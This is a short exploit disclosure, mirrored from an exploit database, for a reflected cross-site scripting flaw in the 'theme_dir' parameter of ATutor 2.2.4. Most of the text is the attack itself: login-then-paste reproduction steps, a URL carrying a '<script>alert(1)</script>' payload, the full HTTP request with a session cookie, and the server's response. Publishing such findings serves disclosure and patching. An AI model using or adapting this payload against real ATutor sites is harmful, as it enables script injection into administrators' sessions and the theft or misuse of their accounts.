Share
## https://sploitus.com/exploit?id=PACKETSTORM:188884
# Exploit Title: Reflected XSS - atutorv2.2.4
    # Date: 01/2025
    # Exploit Author: Andrey Stoykov
    # Version: 2.2.4
    # Tested on: Ubuntu 22.04
    # Blog:
    https://msecureltd.blogspot.com/2025/01/friday-fun-pentest-series-17-reflected.html
    
    Description:
    
    - It was found that the application was vulnerable to Reflected XSS.
    
    
    Reflected XSS #1 - "theme_dir":
    
    Steps to Reproduce:
    
    1. Login to the application with admin user
    2. Paste the following URL into the browser
    
    http://192.168.1.110/atutor/mods/_core/themes/index.php?type=Mobile&enable=Enable&theme_dir=
    <script>alert(1)</script>&mobile_version=2.2.2
    
    
    // HTTP GET Request
    
    GET
    /atutor/mods/_core/themes/index.php?type=Mobile&enable=Enable&theme_dir=<script>alert(1)</script>&mobile_version=2.2.2
    HTTP/1.1
    Host: 192.168.1.110
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0)
    Gecko/20100101 Firefox/135.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-GB,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Connection: keep-alive
    Cookie: ATutorID=f6oaq82rkkjc2efnmi1qkig537; flash=no
    Upgrade-Insecure-Requests: 1
    Priority: u=0, i
    
    
    // HTTP Response
    
    HTTP/1.1 302 Found
    Date: Sat, 18 Jan 2025 20:39:58 GMT
    Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev
    Perl/v5.16.3
    X-Powered-By: PHP/5.6.40
    Set-Cookie: ATutorID=o0p8bdoggbsj1h0lf1des5gcm1; path=/atutor/; HttpOnly
    Set-Cookie: ATutorID=o0p8bdoggbsj1h0lf1des5gcm1; path=/atutor/; HttpOnly
    Set-Cookie: flash=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0
    Location: /atutor/mods/_core/themes/index.php
    Vary: Accept-Encoding
    Content-Length: 0
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=utf-8